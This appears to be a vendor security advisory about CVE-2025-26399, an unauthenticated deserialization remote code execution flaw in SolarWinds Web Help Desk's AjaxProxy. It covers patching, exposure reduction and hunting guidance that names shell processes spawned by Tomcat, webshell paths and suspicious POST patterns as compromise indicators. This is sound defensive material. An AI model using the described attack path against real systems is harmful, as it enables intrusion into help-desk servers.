SolarWinds released Web Help Desk 12.8.7 Hotfix 1 to fix CVE-2025-26399, an unauthenticated remote code execution flaw in the AjaxProxy component caused by unsafe deserialization. This bug is a third-round patch: a bypass of CVE-2024-28988, itself a bypass of CVE-2024-28986, which CISA previously flagged as exploited.
While no in-the-wild exploitation of CVE-2025-26399 is reported yet, history and exposure make public-facing WHD instances high-risk and urgent to patch.
Exposure & Impact
Any WHD instance at 12.8.7 or lower is vulnerable until the hotfix JARs are installed. Exploitation requires only network access to WHD and can lead to command execution under the WHD service context (commonly SYSTEM on Windows or root-equivalent actions via the service account on Linux).
What to Do Now
- Apply the hotfix (12.8.7 HF1) and restart WHD following SolarWinds’ exact JAR-replacement steps.
- Reduce exposure by removing public access or placing WHD behind VPN/geofencing/WAF until patched.
- Hunt for compromise on the WHD host and timeframe prior to patch: look for Java/Tomcat spawning shells or scripts, unexpected tasks/services, webshells under webapps/helpdesk/, and unusual POSTs to AjaxProxy endpoints with large bodies.
Detection Guidance
On the host, pivot from the WHD Java/Tomcat process and review any child cmd.exe, powershell.exe, bash, or sh activity and recent file writes inside WEB-INF/lib and adjacent paths.
In network and web logs, search for spikes of POST requests to AjaxProxy with unusually large payloads or serialized-object markers, and correlate any 500/404 anomalies with host process starts.
Why It Matters
Two bypasses in about a year indicate attackers are diffing patches and iterating. Admin-adjacent tools like WHD often sit in sensitive network segments; if compromised, they provide convenient staging points for lateral movement.
OP Innovate Recommendations
Prioritize internet-reachable WHD for immediate remediation, then internal-only instances in the next change window. Add the simple host and network hunts above to your SIEM/EDR.
If you need help validating the patch or checking for signs of compromise, our IR & PTaaS teams can assist with verification scans and hardening.
Stay Safe. Stay Secure.
OP Innovate Research Team
